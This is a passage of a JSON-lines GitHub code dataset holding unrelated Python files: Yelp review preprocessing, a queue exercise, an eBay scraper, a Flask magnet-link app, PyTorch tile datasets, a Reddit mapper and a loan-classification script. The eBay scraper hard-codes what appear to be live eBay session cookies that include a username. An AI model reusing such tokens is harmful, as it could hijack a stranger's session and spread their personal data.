data\nrestaurant_reviews = restaurant_reviews[(restaurant_reviews[\"state\"] == \"CA\") |\n (restaurant_reviews[\"state\"] == \"FL\")] # only use reviews from restaurants in california and florida, ~ 800,000\nreviews = restaurant_reviews[\"text\"]\n\n# get rid of symbols\ndef remove_symbols(string):\n string = re.sub(\"\\n\", \" \", string) # replace \\n symbol with space\n new_string = re.sub(\"[^a-zA-Z0-9 ]\", \"\", string) # take away all symbols\n return new_string\nremove_symbols(reviews[0]) # try function\nreviews = reviews.map(remove_symbols)\nrestaurant_reviews = pd.concat([restaurant_reviews, reviews], axis = 1)\nrestaurant_reviews.columns = ['Unnamed: 0.1', 'Unnamed: 0', 'business_id', 'name', 'address', 'city',\n 'state', 'stars', 'is_open', 'attributes', 'categories', 'user_id',\n 'review_stars', 'text', 'date', 'text_no_symbol']\nrestaurant_reviews.to_csv(\"restaurant_reviews.csv\")\n\n# function for stemming and tokenize words\nstemmer = SnowballStemmer(language='english')\ndef lemmatize_stemming(token):\n # input: token word\n # output stemmed/lemmatized token\n return stemmer.stem(WordNetLemmatizer().lemmatize(token, pos='v'))\n\n# function to remove stopwords\nstop_words = set(stopwords.words('english'))\ndef remove_stopwords(text):\n # input string\n # output: list of tokenized words in string with stop words removed\n filtered_sentence = [w for w in gensim.utils.simple_preprocess(text) if w.lower() not in stop_words]\n return filtered_sentence\n\n# combine two functions for preprocessing\ndef preprocess(text):\n # input string\n # output: list of tokenized words, stemmed and lemmatized\n result = [lemmatize_stemming(token) for token in remove_stopwords(text)]\n return result\npreprocess(reviews[65]) # test function\nreviews[0:2].map(preprocess)\n\n# test function on time\nimport time\nstart = time.time()\nreviews[0:10000].map(preprocess)\nend = time.time()\nprint(\"Run time on 10000 samples: \" + str(end - start) + \"secs\") # about 15 seconds on 10k samples\n\nreviews = reviews.map(preprocess)\nrestaurant_reviews = pd.concat([restaurant_reviews, reviews], axis = 1)\nrestaurant_reviews.columns = ['Unnamed: 0.1', 'Unnamed: 0', 'business_id', 'name', 'address', 'city',\n 'state', 'stars', 'is_open', 'attributes', 'categories', 'user_id',\n 'review_stars', 'text', 'date', 'text_no_symbol', 'preprocessed_text']\nrestaurant_reviews.to_csv(\"restaurant_reviews.csv\")\n\n##### Detect Bigrams\n(x_train, x_test) = train_test_split(reviews, test_size = 0.3)\nx_train = x_train.sort_index() # reorder df\nx_train = x_train.reset_index() # reset index but preserve old index for later\nx_train_reviews = x_train['text']\nx_train.to_csv(\"x_train.csv\")\n\nx_test = x_test.sort_index()\nx_test = x_test.reset_index()\nx_test_reviews = x_test['text']\nx_test.to_csv(\"x_test.csv\")\n\n# construct bigrams for entire corpus\nstart = time.time()\n[[re.sub(\" \", \"_\", string) for string in [' '.join((a, b)) for (a, b) in review]] for review in reviews[0:10000].map(bigrams).map(list)]\nend = time.time()\nprint(\"Run time on 10000 samples: \" + str(end - start) + \"secs\") # 2.9 seconds for 10k docs\n\nbigram_reviews_train = [[re.sub(\" \", \"_\", string) for string in [' '.join((a, b)) for (a, b) in review]] for review in x_train_reviews.map(bigrams).map(list)]\nunlist_bigram_reviews_train = list(chain.from_iterable(bigram_reviews_train)) # flatten list\n\n# find most common bigrams\ncommon_bigrams = [a for (a, b) in Counter(unlist_bigram_reviews_train).most_common(100)]\ncounts = [b for (a, b) in Counter(unlist_bigram_reviews_train).most_common(100)]\nnp.min(counts) # bigrams show up at least 5022 times in entire corpus\n\n\nnew_tokenized = []\n\ndef tokenize_review(review):\n # inpput review\n # ooutput tokenized review accounting for bigrams\n # ie. if tokens are in a common bigram, it will be regarded as a bigram instead of an individual token\n tokenize = []\n j = 0\n while j < len(review) - 1:\n if '_'.join((review[j], review[j+1])) in common_bigrams:\n tokenize.append('_'.join((review[j], review[j + 1])))\n j += 2\n else:\n if len(review[j]) > 3: # only consider words with more than 3 letters\n tokenize.append(review[j])\n j += 1\n if j == len(review) - 1:\n if len(review[j]) > 3:\n tokenize.append(review[j])\n return tokenize\n[tokenize_review(review) for review in reviews[0:2]] # test function\n\nstart = time.time()\ntokenized_bigram_train = [tokenize_review(review) for review in x_train_reviews]\ntokenized_bigram_test = [tokenize_review(review) for review in x_test_reviews]\nend = time.time()\nprint(\"Run time on 10000 samples: \" + str(end - start) + \"secs\")\n\nx_train[\"tokenized_bigram_train\"] = tokenized_bigram_train\nx_test[\"tokenized_bigram_test\"] = tokenized_bigram_test\nx_train.to_csv(\"x_train.csv\")\nx_test.to_csv(\"x_test.csv\")\n# save lists as json\n\nwith open(\"tokenized_bigram_train.json\", 'w') as f:\n json.dump(tokenized_bigram_train, f, indent = 2)\nwith open(\"tokenized_bigram_test.json\", 'w') as f:\n json.dump(tokenized_bigram_test, f, indent=2)\n\n", "repo_name": "samantha-tsang/yelpReviewsAnalysis", "sub_path": "data.py", "file_name": "data.py", "file_ext": "py", "file_size_in_byte": 7767, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_json", "line_number": 24, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 49, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 62, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 67, "usage_type": "call"}, {"api_name": "nltk.stem.SnowballStemmer", "line_number": 74, "usage_type": "call"}, {"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 78, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 81, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 81, "usage_type": "name"}, {"api_name": "gensim.utils.simple_preprocess", "line_number": 85, "usage_type": "call"}, {"api_name": "gensim.utils", "line_number": 85, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 99, "usage_type": "call"}, {"api_name": "time.time", "line_number": 101, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 105, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 112, "usage_type": "call"}, {"api_name": "time.time", "line_number": 124, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 125, "usage_type": "call"}, {"api_name": "nltk.bigrams", "line_number": 125, "usage_type": "argument"}, {"api_name": "time.time", "line_number": 126, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 129, "usage_type": "call"}, {"api_name": "nltk.bigrams", "line_number": 129, "usage_type": "argument"}, {"api_name": "itertools.chain.from_iterable", "line_number": 130, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 130, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 133, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 135, "usage_type": "call"}, {"api_name": "time.time", "line_number": 160, "usage_type": "call"}, {"api_name": "time.time", "line_number": 163, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 173, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 175, "usage_type": "call"}]}
+{"seq_id": "16333487097", "text": "from collections import deque\r\nclass QUEUE: # use deque\r\n def __init__(self, q=None):\r\n if q == None:\r\n self.items = deque()\r\n else:\r\n self.items = deque(q, len(q))\r\n def enQueue(self, i):\r\n self.items.append(i)\r\n def deQueueRight(self):\r\n self.items.pop()\r\n def deQueue(self):\r\n return self.items.popleft()\r\n\r\n def isEmpty(self):\r\n return len(self.items) == 0\r\n\r\n def size(self):\r\n return len(self.items)\r\n def showQueu(self):\r\n Q = []\r\n for i in self.items:\r\n Q.append(i)\r\n return Q\r\n\r\ninp = [k for k in input(\"Enter Input : \").split(\",\")]\r\nq = QUEUE()\r\ncheck = False\r\ncheck2 = False\r\ncheck3 = False\r\nfor l in range(0,len(inp)):\r\n if all(j == 'D' for j in inp ) == True :\r\n print(\"-1\")\r\n continue\r\n if inp[l] == 'D':\r\n if not q.isEmpty():\r\n print(f'Pop {q.items[0]}',end=\" \")\r\n q.deQueue()\r\n print(f'size in queue is {q.size()}',)\r\n if q.isEmpty() and check == True:\r\n check3 = True\r\n print('-1')\r\n continue\r\n else:\r\n if check == False:\r\n print('-1')\r\n check = True\r\n check2 = True\r\n continue\r\n\r\n\r\n if 'E' in inp[l]:\r\n E, value = inp[l].split()\r\n if E == 'E':\r\n print(f'Add {value} index is {q.size()}')\r\n q.enQueue(value)\r\n\r\nif not q.isEmpty():\r\n print(f'Number in Queue is : {q.showQueu()}')\r\nelse:\r\n print('Empty')\r\n\r\n", "repo_name": "Paramee0598/Data_Structures_ExAndTest", "sub_path": "ch4/ex41.py", "file_name": "ex41.py", "file_ext": "py", "file_size_in_byte": 1571, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "collections.deque", "line_number": 5, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 7, "usage_type": "call"}]}
+{"seq_id": "31104010606", "text": "import pandas as pd\nimport re\nimport csv\nimport pymongo\nfrom bs4 import BeautifulSoup\nfrom multiprocessing.pool import ThreadPool\nfrom helpers.downloader_helper import DownloaderHelper\n\ndownloader = DownloaderHelper(use_proxy=True, client_name='all')\n\n\ndef get_collection():\n try:\n connection = pymongo.MongoClient('localhost', 27017)\n db = connection['slava']\n collection = db['ebay_group_deal_store']\n except Exception as e:\n raise e\n return collection\n\n\ndef get_product_to_scrape():\n collection = get_collection()\n result = list(collection.find({\"ebay_search_result.fitment\": \"\"}, {'Product': 1, '_id': 0}))\n products_to_scrape = {str(source_item['Product']): source_item for source_item in result}\n\n # get items to process\n items_to_process = []\n for product_id in products_to_scrape.keys():\n items_to_process.append(products_to_scrape[product_id])\n print(len(items_to_process))\n return items_to_process\n\n\ndef chunkify(l, n):\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\n\ndef write_to_csv(output_list, method, delimiter):\n output_file = '/home/slava/Slava_Projects/New_Ebay/FIles/output_file_copy.csv'\n\n with open(output_file, method) as f:\n writer = csv.writer(f, delimiter=delimiter, quoting=csv.QUOTE_MINIMAL)\n writer.writerows([output_list])\n\n\ndef get_page(url):\n cookies = {'_ga': 'GA1.2.415030213.1540820804', '_gid': 'GA1.2.1929604581.1540820804',\n 'AMCVS_A71B5B5B54F607AB0A4C98A2%40AdobeOrg': '1',\n 'bm_sv': '2B0EAE81F8211718FF0CBEB7B77D1638~R5jZTqLv3jspGpIq/lpHpneJ3ICLd+YsnA0ziCJ5aU9dYnNFqNc3YFywpJvOLo5dQPnX3qmMZDa0DtNQLjGDTgxMZ4WWdsnb427VvuFjeZIDBQO/j+48A5HhZJveqS7wnWho9Wr2ADppgNItZv5BNBcRyL8wQB8q7yVznGI03G4',\n 'ak_bmsc': '1AABA9E4B8BAF724D36F7ADB269CD1F4685E645DB4660000250DD75BD7C74F0A~pl0KjlYyCW59HjQRYcqlEmDZB0T++X8CD2inbLIVr8n88mds81Z+cbD/yFEIvQopX1FvfQ0RhbHpOIqcZ02BPY5HUvCZrYR+9FZK59JJM6F5mAeuRgo63IlXS9T5PgpJfMSlcHafxhDXsyC9Y81TChf6ZU4gqjrMDfYZi7BkYKd0tlCis7lCYK3laKcGGQauwzl4MerH1emkegsunHjbvN6BIvr+q274H9iyFe5jR99kU',\n 'cid': '3za4G3Gj8Gn7nEfV%23551347784', 'ds1': 'ats/1540834013526',\n 'aam_uuid': '65016836551818795772119429020039847006', 'cssg': 'ab4d76f61660aad9a112c56afe64d3f6',\n 'JSESSIONID': 'C3BF53B00AC731F21BE0FD513B88B8B8',\n '__gads': 'ID=ee6ba28b70854516:T=1544705983:S=ALNI_MYHEqtZ0goNC9Y-72RAyWojBgEemA',\n 'AMCV_A71B5B5B54F607AB0A4C98A2%40AdobeOrg': '-1758798782%7CMCIDTS%7C17878%7CMCMID%7C65004536900471973482118213068408661475%7CMCAAMLH-1545242975%7C6%7CMCAAMB-1545311304%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCCIDH%7C-141992339%7CMCOPTOUT-1544713704s%7CNONE%7CMCAID%7CNONE',\n 'npii': 'btguid/ab4d76f61660aad9a112c56afe64d3f65df38d57^cguid/ab4d76ff1660aad9a112c56afe64d3f05df38d57^',\n 'ns1': 'BAQAAAWd7qgEFAAaAAKUADV3zjWwxODU2MzQ3ODcwLzA7ANgAWF3zjWxjODR8NjAxXjE1NDA4MzQwMTQwMDZeYVhad1pYUXhOUT09XjFeM3wyfDV8NHw3fDExXjFeMl40XjNeMTJeMTJeMl4xXjFeMF4xXjBeMV42NDQyNDU5MDc1JPhAofINc4vakRyi2ER3jRI09L8*',\n 'dp1': 'bkms/in5fd4c0ec^u1f/Ivan5df38d6c^u1p/aXZwZXQxNQ**5df38d6c^bl/USen-US5fd4c0ec^expt/00015415880860125cd35e36^pbf/%23e000e000008180c20000045df38d6c^',\n 's': 'CgAD4ACBcE6tsYWI0ZDc2ZjYxNjYwYWFkOWExMTJjNTZhZmU2NGQzZjYA7gCfXBOrbDMGaHR0cHM6Ly93d3cuZWJheS5jb20vc2NoL2kuaHRtbD9fZnJvbT1SNDAmX3Rya3NpZD1tNTcwLmwxMzEzJl9ua3c9QUMxMDAwMTc3UiZfc2FjYXQ9MCZMSF9UaXRsZURlc2M9MCZfb3NhY2F0PTAmX29ka3c9QUMxMDAwMTc3JkxIX1RpdGxlRGVzYz0wI2l0ZW0zNjIzODBiNTY2B86xLdY*',\n 'nonsession': 'BAQAAAWd7qgEFAAaAAJ0ACF3zjWwwMDAwMDAwMQFkAARd841sIzA4YQAIABxcOebsMTU0NDcwNTk4MXgyMzI1MjM4NzE1OTB4MHgyWQAzAA5d841sMTEyMjAtMTcxNCxVU0EAywACXBJg9DkxAEAAB13zjWxpdnBldDE1ABAAB13zjWxpdnBldDE1AMoAIGV4W2xhYjRkNzZmNjE2NjBhYWQ5YTExMmM1NmFmZTY0ZDNmNgAEAAdduHZdaXZwZXQxNQCcADhd841sblkrc0haMlByQm1kajZ3Vm5ZK3NFWjJQckEyZGo2QU1sWVNpREplS3BneWRqNng5blkrc2VRPT1BS2xSDGgmYGXqrN2V0G6ArYeFWA**',\n 'ebay': '%5EsfLMD%3D0%5Esin%3Din%5Edv%3D5bd73943%5Esbf%3D%2340400000000010000000004%5Ecos%3D2%5Ecv%3D15555%5Ejs%3D1%5Epsi%3DArqzCyjo*%5E',\n 'ds2': 'sotr/b8_5azzzzzzz^'}\n attempts = 20\n while attempts > 0:\n attempts -= 1\n try:\n overview_page = downloader.get_page(url, cookies)\n soup = BeautifulSoup(overview_page, 'lxml')\n return soup\n except:\n pass\n\n\ndef get_links(sku):\n items_links = []\n soup = get_page('https://www.ebay.com/sch/i.html?_from=R40&_trksid=m570.l1313&_nkw='+str(sku)+'&_sacat=0')\n try:\n results = soup.find('h1', class_='srp-controls__count-heading').text.split(' ')[0]\n except:\n pass\n if results != '0':\n try:\n items = soup.find('ul', id='ListViewInner')\n links_list = items.find_all('li', class_=re.compile('^sresult lvresult clearfix li'))\n except:\n try:\n items = soup.find('ul', class_='srp-results srp-list clearfix')\n links_list = items.find_all('li', class_='s-item')\n except:\n pass\n try:\n for link in links_list:\n items_links.append(link.find('div', class_='s-item__info clearfix').find('a')['href'])\n except:\n pass\n\n return items_links\n\n\ndef found_fitment(link):\n fitment = False\n ebay_id = None\n soup = get_page(link)\n fitments = soup.find('div', id='vi-ilComp')\n if fitments:\n fitment = True\n ebay_id = soup.find('div', id='descItemNumber').text\n return fitment, ebay_id\n\n\ndef get_fitment(item):\n # if item['Match'] is None:\n fitment_found = False\n sku = item['sku']\n item_links_sku = get_links(sku)\n if item_links_sku:\n for item_link in item_links_sku:\n fitment, ebay_id = found_fitment(item_link)\n if fitment:\n item['Match'] = ebay_id\n fitment_found = True\n break\n if not fitment_found:\n sku2 = item['sku 2']\n item_links_sku2 = get_links(sku2)\n if item_links_sku2:\n for item_link in item_links_sku2:\n fitment, ebay_id = found_fitment(item_link)\n if fitment:\n item['Match'] = ebay_id\n fitment_found = True\n break\n\n if not fitment_found:\n item['Match'] = 'Not found'\n return item\n\n\ndef get_product_title(link):\n pass\n\n\ndef get_fit_and_id(product_to_scrap):\n collection = get_collection()\n for product in product_to_scrap.keys():\n try:\n for link in get_links(product_to_scrap[product]):\n fit, ebay_id = found_fitment(link)\n if fit:\n break\n search_result = {\"fitment\": fit, \"ebay_id\": ebay_id}\n except:\n pass\n try:\n collection.update_one(\n {\"Product\": product_to_scrap[product]},\n {\"$set\": {\n \"ebay_search_result\": search_result,\n }}\n )\n except UnboundLocalError as err:\n continue\n print(\"%s - product was update\" % product_to_scrap[product])\n print(search_result)\n\n\ndef main():\n pool = ThreadPool(30)\n data = pool.map(get_fit_and_id, get_product_to_scrape())\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "RickWazowski98/ebay_scraper", "sub_path": "Ebay/new_ebay.py", "file_name": "new_ebay.py", "file_ext": "py", "file_size_in_byte": 7399, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "helpers.downloader_helper.DownloaderHelper", "line_number": 9, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 14, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 44, "usage_type": "call"}, {"api_name": "csv.QUOTE_MINIMAL", "line_number": 44, "usage_type": "attribute"}, {"api_name": "bs4.BeautifulSoup", "line_number": 70, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 86, "usage_type": "call"}, {"api_name": "multiprocessing.pool.ThreadPool", "line_number": 170, "usage_type": "call"}]}
+{"seq_id": "38537884967", "text": "#! /usr/bin/env python3\n\nfrom flask import Flask, redirect, request\n\nfrom controllers import magnet_link_controller\nfrom view import View\n\napp = Flask(__name__)\n\n@app.route(\"/\", methods = [\"GET\"])\ndef index() -> str:\n html = View(\"index\")\n return html.render()\n\n\n@app.route(\"/create_magnet_link\", methods = [\"POST\", \"GET\"])\ndef create_magnet_link() -> str | None:\n try:\n if request.method == \"POST\":\n name = request.form[\"name\"]\n uri = request.form[\"uri\"]\n magnet_link_controller.create_magnet_link(name, uri)\n return redirect(f\"/search_magnet_links?name={name}\")\n\n html = View(\"pages/magnet_link/create_magnet_link\")\n return html.render()\n except Exception as exception:\n return \"ERROR: \" + str(exception)\n\n\n@app.route(\"/search_magnet_links\", methods = [\"GET\"])\ndef search_magnet_links() -> str:\n try:\n name = request.args.get(\"name\")\n result = magnet_link_controller.search_magnet_links(name)\n html = View(\"pages/magnet_link/search_magnet_links\")\n return html.render({ \"magnet_links\": result })\n except Exception as exception:\n return \"ERROR: \" + str(exception)\n\n\nif __name__ == \"__main__\":\n app.run()\n", "repo_name": "Raisess/magnet-database", "sub_path": "src/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1158, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "32", "api": [{"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "view.View", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 19, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 21, "usage_type": "name"}, {"api_name": "controllers.magnet_link_controller.create_magnet_link", "line_number": 22, "usage_type": "call"}, {"api_name": "controllers.magnet_link_controller", "line_number": 22, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 23, "usage_type": "call"}, {"api_name": "view.View", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "controllers.magnet_link_controller.search_magnet_links", "line_number": 35, "usage_type": "call"}, {"api_name": "controllers.magnet_link_controller", "line_number": 35, "usage_type": "name"}, {"api_name": "view.View", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "41317956929", "text": "\"\"\"PyTorch-compatible datasets.\n\nGuaranteed to implement `__len__`, and `__getitem__`.\n\nSee: http://pytorch.org/docs/0.3.1/data.html\n\"\"\"\nfrom path import Path\n\nimport torch\nfrom PIL import Image\nimport torch.utils.data\nfrom torchvision.transforms import Compose, Normalize\nfrom .transforms import ConvertImageMode, ImageToTensor\nimport cv2\nfrom .tiles import tiles_from_slippy_map, buffer_tile_image\nimport numpy as np\n\nmean, std = [0.485, 0.456, 0.406], [0.229, 0.224, 0.225]\n\n# Single Slippy Map directory structure\nclass SlippyMapTiles(torch.utils.data.Dataset):\n \"\"\"Dataset for images stored in slippy map format.\n \"\"\"\n\n def __init__(self, root, transform=None):\n super().__init__()\n\n self.tiles = []\n self.transform = transform\n\n self.tiles = [(tile, path) for tile, path in tiles_from_slippy_map(root)]\n self.tiles.sort(key=lambda tile: tile[0])\n\n def __len__(self):\n return len(self.tiles)\n\n def __getitem__(self, i):\n tile, path = self.tiles[i]\n image = Image.open(path)\n\n if self.transform is not None:\n image = self.transform(image)\n\n return image, tile\n\n\n# Multiple Slippy Map directories.\n# Think: one with images, one with masks, one with rasterized traces.\nclass SlippyMapTilesConcatenation(torch.utils.data.Dataset):\n \"\"\"Dataset to concate multiple input images stored in slippy map format.\n \"\"\"\n\n def __init__(self, inputs, target, joint_transform=None,debug = False,test = False):\n super().__init__()\n\n # No transformations in the `SlippyMapTiles` instead joint transformations in getitem\n self.joint_transform = joint_transform\n self.test = test\n if debug == False:\n self.inputs = Path(inputs).files()\n print(self.inputs)\n if self.test == False:\n self.target = Path(target).files()\n else:\n self.inputs = Path(inputs).files()[:1000]\n if self.test == False:\n self.target = Path(target).files()\n self.test_transform =Compose([ConvertImageMode(mode=\"RGB\"), ImageToTensor(), Normalize(mean=mean, std=std)])\n\n def __len__(self):\n# return len(self.target)\n return len(self.inputs)\n\n def __getitem__(self, i):\n # at this point all transformations are applied and we expect to work with raw tensors\n\n images = Image.open(self.inputs[i])\n if self.test == False:\n mask = Image.open(self.target[i]).convert('L')\n \n if self.joint_transform is not None:\n images, mask = self.joint_transform(images, mask)\n\n if len(mask.shape) == 3: \n mask = mask.squeeze(0)\n return images, mask\n else:\n return self.test_transform(images)\n# Todo: once we have the SlippyMapDataset this dataset should wrap\n# it adding buffer and unbuffer glue on top of the raw tile dataset.\nclass BufferedSlippyMapDirectory(torch.utils.data.Dataset):\n \"\"\"Dataset for buffered slippy map tiles with overlap.\n \"\"\"\n\n def __init__(self, root, transform=None, size=512, overlap=32):\n \"\"\"\n Args:\n root: the slippy map directory root with a `z/x/y.png` sub-structure.\n transform: the transformation to run on the buffered tile.\n size: the Slippy Map tile size in pixels\n overlap: the tile border to add on every side; in pixel.\n\n Note:\n The overlap must not span multiple tiles.\n\n Use `unbuffer` to get back the original tile.\n \"\"\"\n\n super().__init__()\n\n assert overlap >= 0\n assert size >= 256\n\n self.transform = transform\n self.size = size\n self.overlap = overlap\n self.tiles = list(tiles_from_slippy_map(root))\n\n def __len__(self):\n return len(self.tiles)\n\n def __getitem__(self, i):\n tile, path = self.tiles[i]\n image = buffer_tile_image(tile, self.tiles, overlap=self.overlap, tile_size=self.size)\n\n if self.transform is not None:\n image = self.transform(image)\n\n return image, torch.IntTensor([tile.x, tile.y, tile.z])\n\n def unbuffer(self, probs):\n \"\"\"Removes borders from segmentation probabilities added to the original tile image.\n\n Args:\n probs: the segmentation probability mask to remove buffered borders.\n\n Returns:\n The probability mask with the original tile's dimensions without added overlap borders.\n \"\"\"\n\n o = self.overlap\n _, x, y = probs.shape\n\n return probs[:, o : x - o, o : y - o]\n", "repo_name": "HMS97/satellite_segmentation", "sub_path": "utils/datasets.py", "file_name": "datasets.py", "file_ext": "py", "file_size_in_byte": 4613, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 19, "dataset": "github-code", "pt": "32", "api": [{"api_name": "torch.utils", "line_number": 21, "usage_type": "attribute"}, {"api_name": "tiles.tiles_from_slippy_map", "line_number": 31, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 39, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 39, "usage_type": "name"}, {"api_name": "torch.utils", "line_number": 49, "usage_type": "attribute"}, {"api_name": "path.Path", "line_number": 60, "usage_type": "call"}, {"api_name": "path.Path", "line_number": 63, "usage_type": "call"}, {"api_name": "path.Path", "line_number": 65, "usage_type": "call"}, {"api_name": "path.Path", "line_number": 67, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 68, "usage_type": "call"}, {"api_name": "transforms.ConvertImageMode", "line_number": 68, "usage_type": "call"}, {"api_name": "transforms.ImageToTensor", "line_number": 68, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 68, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 77, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 77, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 79, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.utils", "line_number": 91, "usage_type": "attribute"}, {"api_name": "tiles.tiles_from_slippy_map", "line_number": 117, "usage_type": "call"}, {"api_name": "tiles.buffer_tile_image", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.IntTensor", "line_number": 129, "usage_type": "call"}]}
+{"seq_id": "4393604499", "text": "#!/usr/bin/python3\nimport os\nimport json\nimport sys\n\n# Notes :\n# 1. All Down votes are 0\n# 2. All Controversiality are 0\n\n\n# Option or NLP: NLTK, spaCy\n\nf = open(\"./mp-author-count-in-subreddits/part-00000\", \"r\")\ntop_subreddits=[line.split(\"\\t\")[0].replace(\"\\n\",\"\") for line in f.readlines() if line != \"\\t\\n\"]\n\n\nfor line in sys.stdin:\n try: \n j_i=json.loads(line)\n except:\n continue\n if j_i[\"subreddit\"] in top_subreddits:\n print(j_i[\"author\"]+\"_sep_\"+j_i[\"subreddit\"],1,sep=\"\\t\")", "repo_name": "Mahmoud-Yasser-18/Big-Data-mini-1", "sub_path": "Task1/mp-author-count-in-subreddits/mapper.py", "file_name": "mapper.py", "file_ext": "py", "file_size_in_byte": 511, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "sys.stdin", "line_number": 17, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "13090474027", "text": "import string\nimport json\nimport random\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport graphviz\nfrom os import system\nfrom math import log, sqrt\nfrom sklearn import preprocessing\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\n\n\ndef make_figure(dim, title, xlabel, ylabel, legend):\n plt.rcParams['figure.figsize'] = dim\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n if legend is not None:\n plt.legend(loc=legend, prop={'size': 15})\n plt.rcParams.update({'font.size': 16})\n plt.tight_layout()\n plt.show()\n\n\n\n# load data set\nloans = pd.read_csv('lending-club-data.csv')\nloans['safe_loans'] = loans['bad_loans'].apply(lambda x: +1 if x == 0 else -1)\ndel loans['bad_loans']\n\n# Selecting features\ntarget = 'safe_loans'\nfeatures = ['grade', # grade of the loan (categorical)\n 'sub_grade_num', # sub-grade of the loan as a number from 0 to 1\n 'short_emp', # one year or less of employment\n 'emp_length_num', # number of years of employment\n 'home_ownership', # home_ownership status: own, mortgage or rent\n 'dti', # debt to income ratio\n 'purpose', # the purpose of the loan\n 'payment_inc_ratio', # ratio of the monthly payment to income\n 'delinq_2yrs', # number of delinquincies\n 'delinq_2yrs_zero', # no delinquincies in last 2 years\n 'inq_last_6mths', # number of creditor inquiries in last 6 months\n 'last_delinq_none', # has borrower had a delinquincy\n 'last_major_derog_none', # has borrower had 90 day or worse rating\n 'open_acc', # number of open credit accounts\n 'pub_rec', # number of derogatory public records\n 'pub_rec_zero', # no derogatory public records\n 'revol_util', # percent of available credit being used\n 'total_rec_late_fee', # total late fees received to day\n 'int_rate', # interest rate of the loan\n 'total_rec_int', # interest received to date\n 'annual_inc', # annual income of borrower\n 'funded_amnt', # amount committed to the loan\n 'funded_amnt_inv', # amount committed by investors for the loan\n 'installment', # monthly payment owed by the borrower\n ]\n\n\n# Skipping observations with missing values\nprint (loans.shape)\nloans = loans[[target] + features].dropna()\nprint (loans.shape)\n\n# one-hot encoding\ncategorical_variables = []\nfor feat_name, feat_type in zip(loans.columns, loans.dtypes):\n if feat_type == object:\n categorical_variables.append(feat_name)\n\nfor feature in categorical_variables:\n loans_one_hot_encoded = pd.get_dummies(loans[feature], prefix=feature)\n loans = loans.drop(feature, axis=1)\n for col in loans_one_hot_encoded.columns:\n loans[col] = loans_one_hot_encoded[col]\n\n#####################################################################################################################\n\n\n# train-validation sets\nwith open('module-8-assignment-1-train-idx.json', 'r') as f:\n train_json = json.load(f)\nwith open('module-8-assignment-1-validation-idx.json', 'r') as f:\n validation_json = json.load(f)\ntrain_data = loans.iloc[train_json]\nvalidation_data = loans.iloc[validation_json]\n\n# Gradient boosted tree classifier\ntrain_Y = train_data['safe_loans'].as_matrix()\ntrain_X = train_data.drop('safe_loans', axis=1).as_matrix()\nmodel_5 = GradientBoostingClassifier(n_estimators=5, max_depth=6).fit(train_X, train_Y)\n\n\n# Making predictions\n# Select all 